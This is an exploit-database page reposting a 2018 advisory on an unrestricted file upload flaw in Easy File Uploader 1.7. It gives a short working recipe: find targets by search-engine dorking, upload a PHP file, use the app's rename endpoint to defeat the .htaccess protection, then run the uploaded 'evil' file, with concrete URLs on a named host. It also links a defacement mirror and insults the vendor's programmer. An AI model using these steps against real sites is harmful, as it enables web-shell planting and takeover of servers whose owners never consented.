Advertisement






Easy File Uploader 1.7 unrestricted file upload Vulnerability

CVE Category Price Severity
N/A CWE-434 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-07-06
CPE
cpe:cpe:/a:easy_file_uploader:easy_file_uploader:1.7
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070058

Below is a copy:

Easy File Uploader 1.7 unrestricted file upload Vulnerability
====================================================================================================================================
| # Title     : Easy File Uploader 1.7 unrestricted file upload Vulnerability                                                      |
| # Author    : indoushka                                                                                                          |
| # Telegram  : @indoushka                                                                                                         |
| # Tested on : windows 10 Franais V.(Pro)                                                                                        |
| # Vendor    : https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937                     |  
| # Dork      : N/A                                                                                                                |
====================================================================================================================================


Note : I suspect this programmer Supernatural stupidity !!!!

https://www.youtube.com/watch?v=QLuRxgDpnkE&feature=youtu.be


poc :


[+]  Dorking n Google Or Other Search Enggine .

[+]  upload your php file & they give you link to direct download or rename your file .

http://codecanyon.nelliwinne.net/EasyFileUploader/No%20SQL/download.php?id=fileFolder/example.txt

[+]  but the files Folder protected by .htaccess file : Deny from all ?

[+]  so chos any file to rename it & replace it with the .htaccess ,rename it to any or remove the dot to became htaccess

http://codecanyon.nelliwinne.net/EasyFileUploader/No%20SQL/rename.php?id=x.txt

[+]  now upload your evil & go to : http://codecanyon.nelliwinne.net/EasyFileUploader/No%20SQL/fileFolder/x.php

http://www.zone-h.org/mirror/id/31208319


 Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum